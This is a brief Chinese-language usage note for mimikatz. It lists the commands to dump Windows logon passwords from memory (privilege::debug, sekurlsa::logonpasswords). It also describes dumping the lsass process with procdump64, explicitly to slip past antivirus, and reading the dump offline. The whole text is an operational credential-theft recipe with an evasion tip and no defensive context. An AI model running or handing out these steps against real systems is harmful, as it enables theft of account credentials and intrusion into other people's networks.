mimikatz使用笔记

0、简介

mimikatz可以获取Windows的账户密码

下载地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200308-1

1、命令

1
2
3
4
5
#日志记录所有操作
log
#获取用户密码
privilege::debug
sekurlsa::logonpasswords

2、保存内存

procdump64 是微软官方出的一款工具, 杀软在牛皮也不能杀微软官方的软件吧。因为用户登录的数据存放在 lsass 进程中,我们可以使用procdump先导出lsass信息。把lsass.dmp文件下载到本地。使用mimikatz读取lsass.dmp,列出用户的账号密码

1
2
# 导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3、读取账号密码

1
2
3
sekurlsa::minidump lsass.dmp
log
sekurlsa::logonPasswords full